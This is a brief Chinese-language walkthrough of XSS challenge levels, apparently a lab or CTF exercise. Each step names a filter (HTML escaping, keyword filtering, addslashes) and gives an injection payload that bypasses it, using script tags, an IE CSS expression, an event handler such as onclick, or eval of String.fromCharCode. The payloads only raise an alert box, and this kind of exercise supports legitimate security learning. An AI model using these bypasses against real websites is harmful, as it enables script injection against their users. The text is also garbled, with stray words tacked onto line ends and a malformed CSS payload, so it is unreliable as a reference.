無安全方面的限制,直接使用html
<script>alert(/xss/);</script>express
限制條件:只能使用CSS,不容許使用html標籤安全
咱們知道利用expression能夠用來構造XSS,可是隻能在IE下面測試,因此下面的測試請在IE6中執行。xss
body { black; xss:alert(/xss/));/*IE6下測試*/ }
限制條件:對HTML進行了轉義,Image標籤可用。ide
測試輸入的字符會被插入到src地址中,那麼能夠使用僞協議來繞過。測試
直接輸入spa
alert( /xss/);
或者你也能夠使用事件來繞過,注意閉合語句便可,以下:htm
1" onerror=alert(/xss/); var a="1事件
限制條件:使用了關鍵字過濾。ip
我測試了一下,大部分都過濾了,有部分未過濾,經測試script/onerror過濾了,可是onclick未過濾,使用onclick事件繞過
<img src=# onclick=alert(/xss/);>
限制條件:使用addslashes對特徵字符進行了轉義
也就是說咱們的XSS語句中不能出現單引號,雙引號等等特徵字符。
直接使用
<script>alert(/xss/);</script>
便可繞過
或者使用String.fromCharCode方法,以下:
<script>eval(String.fromCharCode(97,108,101,114,116,40,47,120,47,41,59));</script>